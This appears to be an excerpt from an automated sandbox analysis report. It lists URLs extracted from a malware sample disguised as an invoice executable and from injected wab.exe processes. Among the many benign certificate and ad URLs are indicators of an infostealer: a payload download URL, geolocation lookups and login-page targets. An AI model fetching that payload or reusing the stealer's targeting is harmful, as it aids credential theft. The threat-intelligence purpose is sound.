              Source: wab.exe, 00000007.00000002.31198174813.0000000033D50000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180378733.0000000000A28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp56
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpCU
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.com/
              Source: wab.exe, 00000007.00000002.31182635840.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000002.31180378733.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin
              Source: wab.exe, 00000007.00000002.31180378733.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin1
              Source: wab.exe, 00000007.00000002.31182635840.0000000000E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binForuCrounif-pid.com/KvGfOfeyMpEaqpzI164.bin
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://o.ss2.us/0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://s.symcd.com06
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://status.thawte.com09
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://trc.taboola.com/p3p.xml
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Emphasising.exe.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338608516.000000000335D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000C.00000002.26338179974.00000000007BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Ho
              Source: wab.exe, 0000000C.00000002.26338608516.000000000335D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.31198333561.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.31198333561.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000A.00000002.26373053097.00000000006F3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26362370177.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26366042249.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365903638.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26360801253.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26367618907.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26367388067.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26364273479.00000000030D1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26366322941.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26367527610.00000000030DA000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 0000000A.00000003.26363979719.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, bhv1B7E.tmp.10.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC9fc5c8b8bfb94ba5833ba8065b1de35
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7ca
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/AAehR3S.svg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FAC
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://btloader.com/tag?o=6208086025961472&upapi=true
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://capturemedia-assets.com/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.adnxs.com/v/s/215/trk.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/CommonDiagnostics.js?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=14512.30550
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/microsoft_logo.png?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=14512.30550
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-aad.png?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/hrd/picker-account-msa.png?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/jquery-1.12.4.1.min.js?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/knockout-3.4.2.js?b=16521.30551
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdn.taboola.com/TaboolaCookieSyncScript.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://certs.godaddy.com/repository/0
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://clientconfig.microsoftonline-p.net
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/avatar.png
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/bundle.js
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/fabric.min.css
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contextual.media.net/
              Source: bhv1B7E.tmp.10.drString found in binary or memory: https://contextual.media.net/48/nrrV39259.js
              Source: wab.exe, 0000000A.00000003.26365735882.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26365703627.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
